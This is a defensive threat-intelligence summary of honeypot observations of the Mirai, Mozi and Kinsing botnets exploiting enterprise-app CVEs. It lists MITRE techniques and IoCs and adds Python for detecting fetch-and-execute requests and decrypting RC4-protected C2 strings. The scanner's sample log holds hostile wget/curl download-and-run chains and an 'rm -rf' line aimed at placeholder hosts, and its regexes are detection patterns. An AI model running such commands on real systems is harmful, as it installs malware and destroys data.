Trustwave’s honeypot network across six countries reveals how the Mirai, Mozi, and Kinsing botnets targeted enterprise applications to upload web shells and recruit devices into botnets for DDoS or cryptomining. The report details how public PoCs for disclosed CVEs (GoAnywhere MFT, FortiNAC, Bitbucket, F5 BIG-IP, etc.) were weaponized, how quickly exploits were taken up, and the heavy use of HTTP/HTTPS infrastructure, with emphasis on persistence, lateral movement, and evolving evasion techniques. #GoAnywhereMFT #FortiNAC #Bitbucket #Mirai #Mozi #Kinsing #XMRig #OracleWebLogic
Keypoints
- Trustwave deployed honeypot sensors in six countries (Russia, Ukraine, Poland, UK, China, United States) to study how attackers exploit enterprise apps.
- Over a six-month window through May 2023, 38,000+ unique IPs and 1,100+ payloads were observed; about 19% of web traffic was malicious, with botnets responsible for 95% of that traffic.
- Most exploit traffic targeted public-facing enterprise apps and aimed to upload a web shell for further access.
- Mirai, Mozi, and Kinsing accounted for roughly 95% of HTTP/HTTPS exploit attempts, underscoring IoT/OT device vulnerabilities and crypto-mining goals.
- Infections relied on one-step exploits that fetch the payload with wget or curl; reverse engineering the payloads exposed reusable exploit templates, and PoCs were weaponized quickly (e.g., FortiNAC CVE-2022-39952 was exploited just six days after the PoC was released).
- Kinsing employs RC4-based C2 encryption, cron-based persistence, SSH-key-based lateral movement, and a staged Windows/Linux infection chain (including wbw.xml and 1.ps1).
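As an added illustration of the one-step wget/curl exploit pattern described in the key points above (this is example code, not code from the Trustwave report): a small Python scanner that parses combined-format web access logs, URL-decodes each request, and flags requests that embed a downloader invocation followed by an execution step, then tallies the payload-hosting hosts. The log lines, addresses and URLs are constructed for the example; they use RFC 5737 documentation ranges rather than the report's IoCs.

```python
"""Flag one-step fetch-and-execute exploit attempts in web honeypot access logs."""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Constructed sample log (Apache/nginx "combined" format); not taken from the report.
SAMPLE_LOG = """\
192.0.2.10 - - [01/May/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/May/2023:10:02:15 +0000] "POST /login HTTP/1.1" 401 0 "-" "python-requests/2.28"
203.0.113.5 - - [01/May/2023:10:03:44 +0000] "GET /cgi-bin/;cd%20/tmp;wget%20http://203.0.113.99/bot.sh;chmod%20777%20bot.sh;sh%20bot.sh HTTP/1.1" 404 0 "-" "Mozilla"
203.0.113.5 - - [01/May/2023:10:03:50 +0000] "POST /ws/v1/cluster/apps HTTP/1.1" 404 0 "-" "curl/7.85"
198.51.100.9 - - [01/May/2023:10:05:01 +0000] "GET /shell?cd+/tmp;rm+-rf+*;curl+-O+http://198.51.100.99/x.sh;sh+x.sh HTTP/1.1" 404 0 "-" "Mozilla"
192.0.2.10 - - [01/May/2023:10:06:00 +0000] "GET /docs/wget-manual.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# One combined-format access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# A downloader invocation followed, within the same shell command, by an http(s)/ftp URL.
FETCH_RE = re.compile(
    r'\b(?P<tool>wget|curl)\s+[^;|&]*?(?P<url>(?:https?|ftp)://[^\s;|&"\']+)', re.I
)
# An interpreter or chmod appearing as its own command after the fetch.
EXEC_RE = re.compile(r'(?:^|[;|&\s])(?:sh|bash|dash|chmod|python3?|perl)\b', re.I)


@dataclass
class Alert:
    ip: str
    ts: str
    tool: str
    url: str
    executes: bool  # True when the chain also chmods/runs what it fetched
    ua: str


def decode_target(target: str) -> str:
    """Undo URL-encoding (including '+' as space) so embedded shell fragments become readable.
    Decoding twice catches double-encoded payloads and is a no-op on already-plain text."""
    return unquote_plus(unquote_plus(target))


def analyse_request(target: str):
    """Return (tool, url, executes) if the request embeds a fetch chain, else None."""
    decoded = decode_target(target)
    m = FETCH_RE.search(decoded)
    if not m:
        return None
    tail = decoded[m.end():]  # whatever the attacker chained after the download
    return m.group('tool').lower(), m.group('url'), bool(EXEC_RE.search(tail))


def scan(log_text: str) -> list:
    """Parse every line and collect an Alert for each fetch-and-execute request."""
    alerts = []
    for line in log_text.splitlines():
        parsed = LOG_RE.match(line)
        if not parsed:
            continue  # skip malformed lines rather than abort the whole scan
        hit = analyse_request(parsed['target'])
        if hit:
            tool, url, executes = hit
            alerts.append(Alert(parsed['ip'], parsed['ts'], tool, url, executes, parsed['ua']))
    return alerts


def staging_hosts(alerts: list) -> Counter:
    """Count how often each payload-hosting host appears: candidate blocklist entries."""
    return Counter(re.match(r'[a-z]+://([^/:]+)', a.url, re.I).group(1) for a in alerts)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a.ts} {a.ip} {a.tool} -> {a.url} execute={a.executes} ua={a.ua!r}")
    print(staging_hosts(found))
```

The request containing `/docs/wget-manual.html` is deliberately included to show that the word alone does not trigger the rule: a URL argument must follow the downloader. Hosts returned by `staging_hosts` are the ones worth correlating with proxy and DNS logs, since a single staging server typically feeds many scanning sources.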
MITRE Techniques
- [T1505.003] Web Shell – Upload a web shell to gain ongoing access. “The primary objective of these attacks was to upload a web shell, enabling attackers to carry out further actions against the potential victims that our sensors were mimicking.”
- [T1190] Exploit Public-Facing Application – Exploitation of disclosed CVEs (GoAnywhere MFT, FortiNAC, Bitbucket, etc.). The “payload was meant to confirm presence of CVE-2023-0669 vulnerability by triggering a DNS lookup,” and PoCs were rapidly deployed.
- [T1105] Ingress Tool Transfer – Initial payload delivery using wget/curl to fetch exploit payloads. “These exploits commonly involved operations such as ‘wget’ or ‘curl’.”
- [T1021.004] SSH – Lateral movement via SSH keys found on the victim’s file system. “lateral movement to other machines using SSH keys found on the victim’s file system.”
- [T1071.001] Web Protocols – Command and control over HTTP/HTTPS traffic. “Mirai, Mozi, and Kinsing botnets accounted for 95% of the recorded exploit attempts conducted over the HTTP/HTTPS protocol.”
- [T1573] Encrypted Channel – Encrypted C2 communications (RC4). “Kinsing stores RC4-encrypted C2 URL addresses in the binary, allowing for easy decryption using the hex encoded key… Communication with the C2 server utilizes the RC4 cipher.”
- [T1053.003] Cron – Persistence via cron scheduling. “To ensure persistence, the installer script is added to the cron schedule.”
- [T1059.001] PowerShell – Use of PowerShell scripts for downloading and executing payloads. “downloading a PowerShell script named ‘1.ps1’ … The 1.ps1 script downloads an executable file for the XMRig cryptocurrency miner.”
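The RC4 C2-string recovery that the T1573 entry describes (and the Kinsing key point above), as an added example rather than code from the report: a pure-Python RC4 routine plus an extractor that tries every hex run found in a binary blob as the key and keeps any decryption that looks like a URL. The sample blob, key and URLs are constructed here; that the ciphertexts are themselves stored hex-encoded beside the hex-encoded key is an assumption the report does not state.

```python
"""Recover RC4-encrypted C2 strings stored next to a hex-encoded key in a binary."""
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty key")
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation, XORed with data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Runs of at least 8 hex-encoded bytes (even length, so bytes.fromhex never fails).
HEX_RE = re.compile(rb'(?:[0-9a-fA-F]{2}){8,}')
# A plaintext is accepted only if the whole decryption is a printable URL or an onion host.
URL_RE = re.compile(
    rb'(?:https?://[\x21-\x7e]+|[a-z2-7]{16,56}\.onion(?::\d{1,5})?(?:/[\x21-\x7e]*)?)'
)


def recover_c2(blob: bytes) -> dict:
    """Try every hex run as the key and every other hex run as ciphertext.
    Returns {key_hex: [recovered urls]} for keys that yielded at least one URL."""
    runs = [m.group() for m in HEX_RE.finditer(blob)]
    found = {}
    for key_hex in runs:
        key = bytes.fromhex(key_hex.decode())
        hits = []
        for ct_hex in runs:
            if ct_hex is key_hex:
                continue
            plaintext = rc4(key, bytes.fromhex(ct_hex.decode()))
            if URL_RE.fullmatch(plaintext):
                hits.append(plaintext.decode())
        if hits:
            found[key_hex.decode()] = hits
    return found


def build_sample_blob() -> bytes:
    """Constructed stand-in for a stripped binary: a hex key and hex ciphertexts among noise.
    Key, URLs and addresses are invented for the example (RFC 5737 ranges)."""
    key = b"\x13\x37\xc0\xde\xfa\xce\xb0\x0c"
    urls = [b"http://203.0.113.10/gates.php", b"http://198.51.100.20/cmd"]
    parts = [
        b"\x7fELF\x02\x01\x01" + b"\x00" * 9,          # fake ELF header bytes
        b"/lib64/ld-linux-x86-64.so.2\x00",            # an ordinary string
        key.hex().encode() + b"\x00",                  # the hex-encoded key
    ]
    for u in urls:
        parts.append(rc4(key, u).hex().encode() + b"\x00")  # hex-encoded ciphertexts
    parts.append(b"deadbeefdeadbeef\x00")              # decoy hex run: neither key nor URL
    return b"".join(parts)


if __name__ == "__main__":
    for key_hex, urls in recover_c2(build_sample_blob()).items():
        print(f"key {key_hex}: {urls}")
```

Against a real sample the blob would be the binary's `.rodata` or the output of `strings`, and the candidate-key loop is what makes the approach work without first locating the key by disassembly: the cost is quadratic in the number of hex runs, which is small for a typical malware binary. The same `rc4` routine is what you would use to decode a captured C2 exchange once the key is known.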
Indicators of Compromise
- [IP Address] context – 14.190.186.61, 14.244.239.227 (GoAnywhere MFT CVE-2023-0669 tests).
- [IP Address] context – 185.122.204.197, 185.122.204.196 (Kinsing payload servers).
- [Domain] context – rolibztiz3zfysof5q2rja6airtmbw74am4oc4rgqsh3ktir6zwdmzid.onion:80 (Tor-based C2 proxy).
- [File Hash] context – f65fb40e8aa071ed3bd5456126815d60bc3afd2e18944edc1e5fcf2ea6477429 (Mirai MIPS build, SHA256).
- [File Hash] context – a3df063e24dc5325c9ab6b8c10a709d436213cf08626d890c605d2e2626f91d4 (Mirai MIPS build, SHA256).
- [File Name] context – goshell.jsp and wbw.xml (GoAnywhere/Windows-based exploit artifacts in the Kinsing Windows/Oracle WebLogic path).